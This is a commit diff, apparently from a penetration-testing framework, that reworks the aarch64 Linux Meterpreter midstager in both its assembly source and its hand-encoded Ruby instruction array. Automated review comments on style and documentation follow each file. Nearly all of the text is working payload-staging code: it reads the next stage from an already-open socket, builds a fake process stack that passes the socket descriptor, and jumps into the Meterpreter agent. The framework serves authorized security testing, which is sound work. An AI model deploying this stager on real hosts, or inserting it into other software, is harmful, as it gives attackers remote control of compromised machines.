
Commit 26f4fa3

committed
setup stack
1 parent a239699 commit 26f4fa3


2 files changed

+66
-90
lines changed


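--- a/external/source/shellcode/linux/aarch64/stage_mettle.s
+++ b/external/source/shellcode/linux/aarch64/stage_mettle.s
@@ -44,81 +44,48 @@ read_loop:
 subs x4, x4, x0
 bne read_loop
 
-/* set up the initial stack */
-/*
+/* add entry_offset */
+adr x0, entry
+ldr x0, [x0]
+add x0, x0, x10
+mov x14, x0
 
-add sp, sp, #80
-mov x4, #109
-eor x5, x5, x5
+/* set up the initial stack */
+mov x0, sp
+and sp, x0, #-16
+add sp, sp, #(16 * 6)
+
+/* argc = 2, argv[0] = 'm' */
+mov x0, #2
+mov x1, #109
+str x1, [sp]
+mov x1, sp
+stp x0, x1, [sp, #-16]!
+
+/* argc = 2, argv[1] = 'x12 (sockfd)' */
+mov x2, x12
+mov x3, 0
+stp x2, x3, [sp, #-16]!
+
+mov x4, 0
+mov x5, #7 /* AT_BASE */
 stp x4, x5, [sp, #-16]!
 
-mov x1,#2
-mov x2,sp
-mov x3,#0
-
-mov x4,#2
-mov x5,sp
-mov x6,x12
-mov x7,#0
-mov x8,#0
-mov x9,#7
-mov x10,x10
-mov x11,#0
-mov x12,#0
-
-eor x0, x0, x0
-eor x1, x1, x1
-eor x2, x2, x2
-eor x3, x3, x3
-stp x4, x5, [sp, #-16]!
+mov x6, x10
+mov x7, #6 /* AT_PAGESZ */
 stp x6, x7, [sp, #-16]!
-stp x7, x8, [sp, #-16]!
-stp x9, x10, [sp, #-16]!
-stp x11, x12, [sp, #-16]!
-*/
 
-adr x0, entry
-ldr x0, [x0]
-// entry_offset + mmap
-add x0, x0, x10
+mov x8, #0x1000
+mov x9, #25 /* AT_RANDOM */
+stp x8, x9, [sp, #-16]!
+
+mov x10, x10
+mov x11, #0 /* AT_NULL */
+stp x10, x11, [sp, #-16]!
 
-mov x8, x0
-
-
-/* Set up the fake stack.
-For whatever reason, aarch64 binaries really want AT_RANDOM
-to be available. */
-/* AT_NULL */
-eor x0, x0, x0
-eor x1, x1, x1
-stp x0, x1, [sp, #-16]!
-/* AT_RANDOM */
-mov x2, #25
-mov x3, sp
-stp x2, x3, [sp, #-16]!
-
-/* argc, argv[0], argv[1], envp */
-/* ideally these could all be empty, but unfortunately
-we have to keep the stack aligned. it's easier to
-just push an extra argument than care... */
-stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */
-mov x0, 1
-mov x1, sp
-stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */
-
-br x8
-
-/*
-mov x0, #109
-mov x1, x12
-stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */
-/* mov x0, 2
-mov x1, sp
-stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */
-
-/*
-blr x8
-*/
+mov x29, #0
+mov x30, #0
+br x14
 
 failed:
 mov x0, 0
@@ -132,6 +99,3 @@ size:
 entry:
 .word ENTRY
 .word 0
-m:
-.word 0x0000006d
-.word 0x00000000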
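Review bot: The immediate syntax in the new stack-setup block is inconsistent: `mov x3, 0` and `mov x4, 0` omit the `#` while the neighbouring lines (`mov x1, #109`, `mov x5, #7`) carry it; GNU as accepts both, but one form should be used throughout, e.g. `mov x3, #0` and `mov x4, #0`. `mov x10, x10` at new line 82 is a no-op carried over from the old commented-out block; either drop it (the following `stp x10, x11` already reads x10) or add a comment explaining why it is kept. The numeric immediates are only partly annotated: `#7`, `#6` and `#25` have their AT_* names, but `#109` is explained only in the block comment above it and `#0x1000` has no comment at all, so `/* 'm' */` on the `#109` line and a short note on what `#0x1000` is meant to represent would help, since no named constants are visible in this hunk. The same instruction stream is hand-encoded in modules/payloads/stages/linux/aarch64/meterpreter.rb in this commit, so a header comment here stating that both must be updated together would save future drift.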

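--- a/modules/payloads/stages/linux/aarch64/meterpreter.rb
+++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb
@@ -41,8 +41,7 @@ def handle_intermediate_stage(conn, payload)
 midstager = [
 
 
-
-0x10000582, # adr x2, b0 <size>
+0x10000782, # adr x2, f0 <size>
 0xb9400042, # ldr w2, [x2]
 0xaa0203ea, # mov x10, x2
 0xd34cfc42, # lsr x2, x2, #12
@@ -64,36 +63,49 @@ def handle_intermediate_stage(conn, payload)
 0xaa0403e2, # mov x2, x4
 0xd28007e8, # mov x8, #0x3f // #63
 0xd4000001, # svc #0x0
-0x34000260, # cbz w0, a4 <failed>
+0x34000440, # cbz w0, e0 <failed>
 0x8b000063, # add x3, x3, x0
 0xeb000084, # subs x4, x4, x0
 0x54ffff01, # b.ne 44 <read_loop>
-0x10000280, # adr x0, b8 <entry>
+0x10000480, # adr x0, f8 <entry>
 0xf9400000, # ldr x0, [x0]
 0x8b0a0000, # add x0, x0, x10
-0xaa0003e8, # mov x8, x0
-0xca000000, # eor x0, x0, x0
-0xca010021, # eor x1, x1, x1
-0xa9bf07e0, # stp x0, x1, [sp,#-16]!
-0xd2800322, # mov x2, #0x19 // #25
-0x910003e3, # mov x3, sp
-0xa9bf0fe2, # stp x2, x3, [sp,#-16]!
-0xa9bf07e0, # stp x0, x1, [sp,#-16]!
-0xd2800020, # mov x0, #0x1 // #1
+0xaa0003ee, # mov x14, x0
+0x910003e0, # mov x0, sp
+0x927cec1f, # and sp, x0, #0xfffffffffffffff0
+0x910183ff, # add sp, sp, #0x60
+0xd2800040, # mov x0, #0x2 // #2
+0xd2800da1, # mov x1, #0x6d // #109
+0xf90003e1, # str x1, [sp]
 0x910003e1, # mov x1, sp
 0xa9bf07e0, # stp x0, x1, [sp,#-16]!
-0xd61f0100, # br x8
+0xaa0c03e2, # mov x2, x12
+0xd2800003, # mov x3, #0x0 // #0
+0xa9bf0fe2, # stp x2, x3, [sp,#-16]!
+0xd2800004, # mov x4, #0x0 // #0
+0xd28000e5, # mov x5, #0x7 // #7
+0xa9bf17e4, # stp x4, x5, [sp,#-16]!
+0xaa0a03e6, # mov x6, x10
+0xd28000c7, # mov x7, #0x6 // #6
+0xa9bf1fe6, # stp x6, x7, [sp,#-16]!
+0xd2820008, # mov x8, #0x1000 // #4096
+0xd2800329, # mov x9, #0x19 // #25
+0xa9bf27e8, # stp x8, x9, [sp,#-16]!
+0xaa0a03ea, # mov x10, x10
+0xd280000b, # mov x11, #0x0 // #0
+0xa9bf2fea, # stp x10, x11, [sp,#-16]!
+0xd280001d, # mov x29, #0x0 // #0
+0xd280001e, # mov x30, #0x0 // #0
+0xd61f01c0, # br x14
 0xd2800000, # mov x0, #0x0 // #0
 0xd2800ba8, # mov x8, #0x5d // #93
 0xd4000001, # svc #0x0
+0xd503201f, # nop
+
 payload.length,
 0x00000000, # .word 0x00000000
 entry_offset,
 0x00000000, # .word 0x00000000
-0x0000006d, # .word 0x0000006d
-0x00000000, # .word 0x00000000
-0xd503201f, # nop
-0xd503201f, # nop
 ].pack('V*')
 
 print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)")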
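Review bot: Nothing in the hand-encoded `midstager` array says where the words come from, even though this commit had to re-derive three branch/adr encodings (`adr x2, f0 <size>`, `cbz w0, e0 <failed>`, `adr x0, f8 <entry>`) because instructions were inserted; a comment above `midstager = [` such as `# Machine words of external/source/shellcode/linux/aarch64/stage_mettle.s; re-assemble and update both files together` would make the coupling explicit. The enclosing `handle_intermediate_stage` begins before this hunk. The new `0xd503201f, # nop` placed before `payload.length` has no comment explaining why it is there; it looks like it keeps the data words that follow at the offsets the assembler produced for `size`/`entry`, but that is inferred, so a short comment stating the actual reason belongs on that line.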
